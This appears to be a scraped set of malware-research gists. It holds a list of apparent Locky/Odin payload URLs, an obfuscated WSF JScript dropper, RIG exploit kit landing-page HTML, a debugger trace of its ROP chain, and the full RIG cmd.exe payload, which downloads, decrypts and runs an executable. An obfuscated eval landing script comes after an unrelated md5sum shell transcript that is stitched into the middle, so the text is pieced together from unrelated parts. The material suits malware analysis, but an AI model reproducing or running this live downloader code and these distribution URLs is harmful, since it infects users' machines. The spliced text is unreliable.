00000000 01 01 01 01 01 01 00 01 01 00 01 01 01 01 00 01 |................|
00000010 01 00 01 00 00 01 01 00 00 00 01 00 00 01 00 00 |................|
00000020 00 01 01 01 01 00 01 00 01 01 00 01 01 00 01 01 |................|
00000030 00 01 00 00 00 00 00 01 00 00 01 00 01 01 01 00 |................|
00000040 00 00 01 01 00 01 00 01 01 00 00 00 01 00 01 01 |................|
00000050 01 00 00 00 01 00 01 01 01 01 00 01 00 01 00 01 |................|
00000060 00 01 01 00 00 00 00 00 01 01 01 01 00 00 00 00 |................|
00000070 01 00 01 00 01 01 01 01 01 01 01 00 00 00 01 00 |................|
00000080 01 00 01 00 01 01 00 00 01 01 01 00 01 01 00 01 |................|
00000090 00 01 00 01 01 00 01 01 01 00 01 01 00 01 01 00 |................|
http://u2station.com:80/g766d4ft?rRffpf=NrdcbOsmH
http://imagillaboration.org:80/g766d4ft?rRffpf=NrdcbOsmH
http://www.u2station.com:80/g766d4ft?rRffpf=NrdcbOsmH
http://unstytovar.com:80/0o0qep
http://xceramics.com:80/g766d4ft?rRffpf=NrdcbOsmH
http://resboiu.ro:80/g766d4ft?rRffpf=NrdcbOsmH
http://hotelikbej.pl:80/ild3ha8
http://vonsky.com:80/ez3q7k8
http://prod23.ru:80/v451a3
http://hurrychufa.com:80/4kspi
brad-anton / MALWARE-Updated invoice pdf 8B91A.wsf
Created September 27, 2016 12:51
This single character file was included within an odin (locky) sample 9aa65d84a1.zip but doesn't appear to be used by the malware. More here: https://blog.opendns.com/2016/09/26/odin-lockys-latest-persona/
<job id=1><script target="about:blank" language="JScript">WScript.Sleep(1);
var QFz = "";
var RXj = 0;
/*@cc_on
var Hg=(function f(){return '\x0a';})(),ROd=(function f(){return '\x0d';})(),XAz=(function f(){return 'D';})(),ZNz=(function f(){return 'H';})(),Fn=(function f(){return 'L';})(),TIh=(function f(){return 'P';})(),ZHg=(function f(){return 'T';})(),Ki=(function f(){return 'X';})(),Eo=(function f(){return '\x09';})(),Ax=(function f(){return 'd';})(),Wd=(function f(){return 'h';})(),AGf=(function f(){return 'l';})(),Mm=(function f(){return 'p';})(),BJy=(function f(){return 't';})(),Af=(function f(){return '\x7d';})(),EQi=(function f(){return '\x7c';})(),Ne=(function f(){return '\x7b';})(),WTo=(function f(){return '\x2f';})(),VFn=(function f(){return '\x2d';})(),Xf=(function f(){return '\x2e';})(),Qz=(function f(){return '\x2b';})(),Hk=(function f(){return '\x2c';})(),Kf=(function f(){return '\x2a';})(),KTm=(function f(){return 'C';})(),PIq=(function f(){return 'G';})(),Wk0=(function f(){return 'K';})(),
brad-anton / gist:d4c169bab100f9fa31a95381d533d200
Created January 10, 2017 20:46
Block page logs as a dictionary
{
"timestamp" : "1483998618838",
"response_code" : "403",
"headers" : {
"accept-language" : "es-MX",
"accept-encoding" : "gzip, deflate",
"request" : {
"version" : "1.1",
"protocol" : "HTTP",
"method" : "GET",
brad-anton / evil.html
Created January 10, 2017 22:09
RIG-v/4
<!DOCTYPE html>
<html lang="en">
<head>
<title></title>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=EDGE">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="black">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
brad-anton / Rig ROP Chain
Created January 11, 2017 16:11
Rig ROP Chain
0:013> bp KERNEL32!CreateProcessAStub
0:022> g
Breakpoint 0 hit
eax=00000000 ebx=7717eb70 ecx=00000000 edx=77244048 esi=00000011 edi=04d3b330
eip=7717eb70 esp=04d3b2b4 ebp=04d3b340 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200246
KERNEL32!CreateProcessAStub:
7717eb70 8bff mov edi,edi
0:005> da poi(esp+8)
116f00b2 "cmd.exe /q /c cd /d "%tmp%" && e"
brad-anton / RIG Payload
Created January 11, 2017 16:25
RIG Exploit Kit payload directing victims to this.lung.news
cmd.exe /q /c cd /d "%tmp%" && echo function O(n,g){for(var c=0,s=String,d,D="pu"+"sh",b=[],i=[],r=255,a=0;r+1^>a;a++)b[a]=a;for(a=0;r+1^>a;a++)c=c+b[a]+g[v](a%g.length)^&r,d=b[a],b[a]=b[c],b[c]=d;for(var e=c=a=0,S="fromCharCode";e^<n.length;e++)a=a+1^&r,c=c+b[a]^&r,d=b[a],b[a]=b[c],b[c]=d,i[D](s[S](n[v](e)^^b[b[a]+b[c]^&r]));return i[u(15)](u(11))};function H(g){var T=u(0),d=W(T+"."+T+u(1));d["setProxy"](n);d.open(u(2),g(1),n);d.Option(0)=g(2);d["Sen\x64"];if(0310==d.status)return O(d.responseText/**/,g(n))};T="WinHTTPMRequ";E=T+"est.5.1MGETMScripting.FileSystemObjectMWScript.ShellMADODB.StreamMeroM.ex",u=function(x){return E.split("M")[x]},J=ActiveXObject,W=function(v){return new J(v)};try{E+="eMGetTempNameMcharCodeAtMiso-8859-1MMindexOfM.dllMScriptFullNameMjoinMr\x75nM /c M /\x73 ";var q=W(u(3)),j=W(u(4)),s=W(u(5)),p=u(7),n=0,U=WScript,L=U[u(14)],v=u(9),m=U.Arguments;s.Type=2;c=q[u(8)]();s.Charset=u(012);s.Open();i=H(m);d=i[v](i[u(12)]("P\x45\x00"+"\x00")+027);s.writetext(i);if(037^<d){var z=1;c+=u(13)}els
# Transcript: record MD5 digests for the files in the working directory, then
# re-check them. `md5sum -c` re-hashes each file named in hashes.md5 and prints
# "OK" when the recomputed digest matches the recorded one.
# Caveat: MD5 is not collision-resistant, so this only catches accidental
# corruption; for tamper detection use a SHA-2 digest (e.g. sha256sum) and keep
# the digest file somewhere an attacker who can modify the files cannot reach.
$ echo 'tst' > file1
$ echo 'test' > file2
# The glob also matches hashes.md5 only after it is created, so it is not listed here.
$ md5sum * > hashes.md5
$ cat hashes.md5
746a2ef902cf7596d0c9f66add5524d5 file1
d8e8fca2dc0f896fd7cb4cb0031ba249 file2
$ md5sum -c hashes.md5
file1: OK
file2: OK
<HEAD>
<style>
html {display: none;}
</style>
<script type="text/javascript" src="//code.jquery.com/jquery-latest.min.js"></script>
<script type="text/javascript" src="//cdnjs.cloudflare.com/ajax/libs/jstimezonedetect/1.0.6/jstz.min.js"></script>
<script>eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('$(2).7(3(){$("8").9();0 f=h i();f.j("k",2.4,l);f.5(m);0 g=f.n().o();0 b="p";0 c=("2","q","//s.t-6.u/6.v");c=("w","x-y-1","z");c=("5","A");0 d=B.C();0 e=d.D();$.E({F:4.G,H:"I",J:"K="+e+"&r="+2.L+"&M="+g,N:3(a){O(a)}})});',51,51,'var||document|function|location|send|analytics|ready|body|hide||||||||new|XMLHttpRequest|open|GET|false|null|getAllResponseHeaders|toLowerCase|GoogleAnalyticsObject|script||www|google|com|js|create|UA|3188658|auto|
$(document).ready(function()
{
$("body").hide();
var f=new XMLHttpRequest();
f.open("GET",document.location,false);
f.send(null);
var g=f.getAllResponseHeaders().toLowerCase();
var b="GoogleAnalyticsObject";
var c=("document","script","//www.google-analytics.com/analytics.js");
c=("create","UA-3188658-1","auto");